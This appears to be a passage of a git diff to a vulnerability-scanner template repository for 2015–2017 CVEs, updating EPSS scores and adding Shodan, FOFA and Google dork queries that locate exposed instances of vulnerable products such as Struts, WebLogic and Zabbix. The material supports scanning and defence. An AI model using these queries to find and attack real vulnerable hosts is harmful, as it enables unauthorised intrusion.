--git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 4bb280a998..46aa09eb58 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-7245 cwe-id: CWE-22 - epss-score: 0.96881 - epss-percentile: 0.99685 + epss-score: 0.96378 + epss-percentile: 0.99562 cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index 66e1e5cc4e..efce4d7741 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: joomla product: joomla\! + shodan-query: http.html:"joomla! - open source content management" + fofa-query: body="joomla! - open source content management" tags: cve2015,cve,packetstorm,joomla,sqli variables: num: "999999999" diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index aeb1876bf4..4a2e6f00b8 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-7377 cwe-id: CWE-79 epss-score: 0.00232 - epss-percentile: 0.60606 + epss-percentile: 0.61233 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 2691b887e5..383609faa4 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -21,13 +21,14 @@ info: cve-id: CVE-2015-7450 cwe-id: CWE-94 epss-score: 0.97122 - epss-percentile: 0.99772 + epss-percentile: 0.99794 cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ibm product: tivoli_common_reporting shodan-query: http.html:"IBM WebSphere Portal" + fofa-query: body="ibm websphere portal" tags: cve2015,cve,websphere,deserialization,rce,oast,ibm,java,kev http: diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 7e072d80be..76babb3ca9 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: zohocorp product: manageengine_firewall_analyzer + shodan-query: http.title:"opmanager plus" + fofa-query: title="opmanager plus" + google-query: intitle:"opmanager plus" tags: cve2015,cve,manageengine,edb,lfi,zohocorp http: diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 2d6874a424..48ac5eaa85 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: kentico product: kentico_cms + google-query: intitle:"kentico database setup" + shodan-query: cpe:"cpe:2.3:a:kentico:kentico_cms" + fofa-query: title="kentico database setup" tags: cve2015,cve,kentico,redirect,packetstorm http: diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index f3987bd59c..40f41a116d 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-8813 cwe-id: CWE-918 epss-score: 0.00511 - epss-percentile: 0.74145 + epss-percentile: 0.76541 cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 72bff270c2..24ac9ef8b7 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-9312 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index 1eb135a0b2..2a0210fefb 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2015-9323 cwe-id: CWE-89 - epss-score: 0.00869 - epss-percentile: 0.82013 + epss-score: 0.0071 + epss-percentile: 0.80421 cpe: cpe:2.3:a:duckdev:404_to_301:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index 801ab61c55..ecfc655446 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-9480 cwe-id: CWE-22 - epss-score: 0.57022 - epss-percentile: 0.97634 + epss-score: 0.35852 + epss-percentile: 0.97147 cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 956cf7aa6e..6f4242a870 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -20,7 +20,7 @@ info: cvss-score: 7.5 cve-id: CVE-2016-0957 epss-score: 0.03344 - epss-percentile: 0.91144 + epss-percentile: 0.91361 cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index f510eb8ec5..958d600173 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000126 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.4505 + epss-percentile: 0.46028 cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -30,7 +30,6 @@ info: framework: wordpress google-query: inurl:"/wp-content/plugins/admin-font-editor" tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 7e630bcd37..819cd9a4da 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-1000127 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45851 + epss-percentile: 0.46028 cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -28,7 +28,6 @@ info: product: ajax-random-post framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index c40b7762e2..ddc90d9a85 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000131 cwe-id: CWE-79 - epss-score: 0.00101 - epss-percentile: 0.40457 + epss-score: 0.00114 + epss-percentile: 0.44874 cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: framework: wordpress google-query: inurl:"/wp-content/plugins/e-search" tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index fc40ec91c0..d2a6bff841 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-1000133 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.48963 + epss-percentile: 0.4984 cpe: cpe:2.3:a:designsandcode:forget_about_shortcode_buttons:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: framework: wordpress google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons" tags: cve2016,cve,wordpress,xss,wp-plugin,designsandcode - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 1fcafa1b37..2264face94 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000137 cwe-id: CWE-79 - epss-score: 0.00101 - epss-percentile: 0.40457 + epss-score: 0.00114 + epss-percentile: 0.44874 cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: hero-maps-pro framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,maps,hero-maps-pro_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 1ede5cabd6..770118966e 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -14,13 +14,14 @@ info: - https://wordpress.org/plugins/indexisto - http://web.archive.org/web/20210622181116/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000138 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000138 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45775 + epss-percentile: 0.46028 cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +30,6 @@ info: framework: wordpress google-query: inurl:"/wp-content/plugins/indexisto" tags: cve,cve2016,wordpress,xss,wp-plugin,indexisto_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index e4270a0dd4..f5ce2fac75 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000141 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.48963 + epss-percentile: 0.4984 cpe: cpe:2.3:a:page-layout-builder_project:page-layout-builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -28,7 +28,6 @@ info: framework: wordpress google-query: inurl:"/wp-content/plugins/page-layout-builder" tags: cve,cve2016,wordpress,xss,wp-plugin,page-layout-builder_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index 85f91a7529..bbf7656d47 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000142 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.40793 + epss-percentile: 0.41915 cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: parsi-font framework: wordpress tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,parsi-font_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 56ded7a599..9f372ca8b6 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000148 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.4505 + epss-percentile: 0.46028 cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: s3-video framework: wordpress tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,s3-video_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index 41e5a9b1cd..e2ac7a2657 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000149 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.4505 + epss-percentile: 0.46028 cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: simpel-reserveren framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,simpel-reserveren_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index c398671eff..4bdcd73d1c 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-1000154 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49844 + epss-percentile: 0.4984 cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -28,7 +28,6 @@ info: product: whizz framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,browserweb - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index 096ee2d027..75a648142a 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000155 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.40793 + epss-percentile: 0.41915 cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -27,7 +27,6 @@ info: product: wpsolr-search-engine framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,wpsolr - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index 7e6ebddcfc..d98cfcbb75 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-10033 cwe-id: CWE-88 epss-score: 0.97129 - epss-percentile: 0.99775 + epss-percentile: 0.99797 cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index 8c3a189e04..702f68e8a6 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -28,6 +28,7 @@ info: vendor: western_digital product: mycloud_nas shodan-query: http.favicon.hash:-1074357885 + fofa-query: icon_hash=-1074357885 tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital http: diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index b08fbf231b..928b20a505 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: zabbix product: zabbix + shodan-query: http.favicon.hash:892542951 + fofa-query: icon_hash=892542951 + google-query: intitle:"zabbix-server" tags: cve2016,cve,zabbix,sqli,vulhub http: diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index c8b0252ad6..fed3c400cf 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -29,6 +29,8 @@ info: vendor: opsview product: opsview shodan-query: title:"Opsview" + fofa-query: title="opsview" + google-query: intitle:"opsview" tags: cve2016,cve,opsview,lfi http: diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index f9d85a4d80..1c4eb8cc3d 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -28,6 +28,9 @@ info: max-request: 1 vendor: opsview product: opsview + shodan-query: http.title:"opsview" + fofa-query: title="opsview" + google-query: intitle:"opsview" tags: cve2016,cve,redirect,opsview,authenticated http: diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index 5edceadde7..185382a673 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -15,13 +15,14 @@ info: - https://www.exploit-db.com/exploits/39575 - https://nvd.nist.gov/vuln/detail/CVE-2016-10924 - https://wordpress.org/plugins/ebook-download/#developers + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-10924 cwe-id: CWE-22 - epss-score: 0.01429 - epss-percentile: 0.85146 + epss-score: 0.01089 + epss-percentile: 0.84323 cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index c9d3a43858..9f95b59b3d 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -14,13 +14,14 @@ info: - https://wpvulndb.com/vulnerabilities/8609 - https://wordpress.org/plugins/mail-masta/#developers - https://nvd.nist.gov/vuln/detail/CVE-2016-10956 + - https://github.com/p0dalirius/CVE-2016-10956-mail-masta classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-10956 cwe-id: CWE-20 - epss-score: 0.01238 - epss-percentile: 0.83962 + epss-score: 0.01123 + epss-percentile: 0.84583 cpe: cpe:2.3:a:mail-masta_project:mail-masta:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index 38766f39fb..fcfe76565d 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-10973 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54991 + epss-percentile: 0.54797 cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 34b85f7428..8ab955c6c9 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2016-10993 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.62591 + epss-percentile: 0.64569 cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -30,7 +30,6 @@ info: product: scoreme framework: wordpress tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index b90433e242..7a9eaff751 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1555 cwe-id: CWE-77 epss-score: 0.97373 - epss-percentile: 0.99898 + epss-percentile: 0.99904 cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index 7767adc2bf..2536246317 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -28,6 +28,7 @@ info: vendor: sap product: netweaver shodan-query: http.favicon.hash:-266008933 + fofa-query: icon_hash=-266008933 tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb http: diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index b3519b5695..868ea59f72 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -28,6 +28,9 @@ info: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve2016,cve,struts,rce,apache http: diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index fbbabd7b21..3312c41296 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -27,6 +27,7 @@ info: max-request: 2 vendor: apache product: activemq + shodan-query: cpe:"cpe:2.3:a:apache:activemq" tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive variables: rand1: '{{rand_int(11111111, 99999999)}}' diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index 9c1dd44d28..2ebddc1154 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -26,6 +26,8 @@ info: max-request: 1 vendor: fortinet product: fortios + shodan-query: http.html:"/remote/login" "xxxxxxxx" + fofa-query: body="/remote/login" "xxxxxxxx" tags: cve2016,cve,redirect,fortinet,fortios,seclists http: diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 5f4e61ccec..4c3713b555 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -20,12 +20,13 @@ info: cve-id: CVE-2016-4975 cwe-id: CWE-93 epss-score: 0.00399 - epss-percentile: 0.70799 + epss-percentile: 0.73471 cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: http_server + shodan-query: cpe:"cpe:2.3:a:apache:http_server" tags: cve2016,cve,crlf,apache,xss http: diff --git a/http/cves/2016/CVE-2016-5674.yaml b/http/cves/2016/CVE-2016-5674.yaml index 57d085ae5e..80c8c993fb 100644 --- a/http/cves/2016/CVE-2016-5674.yaml +++ b/http/cves/2016/CVE-2016-5674.yaml @@ -14,8 +14,8 @@ info: cvss-score: 9.8 cve-id: CVE-2016-5674 cwe-id: CWE-20 - epss-score: 0.95705 - epss-percentile: 0.99378 + epss-score: 0.95793 + epss-percentile: 0.99431 cpe: cpe:2.3:a:netgear:readynas_surveillance:1.1.1:*:*:*:*:*:*:* metadata: verified: true @@ -24,7 +24,6 @@ info: product: readynas_surveillance fofa-query: app="NUUO-NVRmini" || app="NUUO-NVR" || title="Network Video Recorder Login" tags: cve,cve2016,nuuo,rce - variables: rand: "{{to_lower(rand_text_alpha(32))}}" diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 76c43f3f6e..31fe431833 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2016-6195 cwe-id: CWE-89 epss-score: 0.00284 - epss-percentile: 0.68042 + epss-percentile: 0.68612 cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* metadata: verified: "true" @@ -30,6 +30,8 @@ info: vendor: vbulletin product: vbulletin shodan-query: title:"Powered By vBulletin" + google-query: intext:"powered by vbulletin" + fofa-query: body="powered by vbulletin" tags: cve2016,cve,vbulletin,sqli,forum,edb http: diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index 016d2dad45..2728c52e37 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-7552 cwe-id: CWE-22 epss-score: 0.96711 - epss-percentile: 0.99632 + epss-percentile: 0.99651 cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 565495b0d6..0aa33cf5a9 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -22,12 +22,14 @@ info: cve-id: CVE-2016-7981 cwe-id: CWE-79 epss-score: 0.00258 - epss-percentile: 0.63488 + epss-percentile: 0.6548 cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: spip product: spip + shodan-query: http.html:"spip.php?page=backend" + fofa-query: body="spip.php?page=backend" tags: cve2016,cve,xss,spip http: diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index 2da0f6239e..c98637a9a2 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -14,13 +14,14 @@ info: - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt - https://www.exploit-db.com/exploits/41482/ - https://nvd.nist.gov/vuln/detail/CVE-2016-8527 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-8527 cwe-id: CWE-79 - epss-score: 0.00166 - epss-percentile: 0.53225 + epss-score: 0.00117 + epss-percentile: 0.45479 cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index cd9341263b..b0e95f4acb 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: dnnsoftware product: dotnetnuke + fofa-query: app="dotnetnuke" tags: cve2017,cve,dnn,dotnetnuke,hackerone,oast,ssrf,dnnsoftware http: diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index 31c0a4ce81..8431418b88 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -19,12 +19,13 @@ info: cve-id: CVE-2017-1000028 cwe-id: CWE-22 epss-score: 0.97516 - epss-percentile: 0.99984 + epss-percentile: 0.99986 cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:* metadata: max-request: 2 vendor: oracle product: glassfish_server + shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server" tags: cve,cve2017,oracle,glassfish,lfi,edb http: diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index cff57e655a..f3d13672d8 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -25,6 +25,7 @@ info: max-request: 1 vendor: oracle product: glassfish_server + shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server" tags: cve,cve2017,glassfish,oracle,lfi http: diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index d81d35df5f..01a9c8319c 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -15,12 +15,13 @@ info: - http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940 - https://nvd.nist.gov/vuln/detail/CVE-2017-10075 - http://www.securitytracker.com/id/1038940 + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2017-10075 epss-score: 0.00451 - epss-percentile: 0.72424 + epss-percentile: 0.75082 cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index f1070a0a21..3cec81e3c6 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: oracle product: weblogic_server + shodan-query: http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2017,weblogic,oast,kev,vulhub,rce,oracle http: diff --git a/http/cves/2017/CVE-2017-11165.yaml 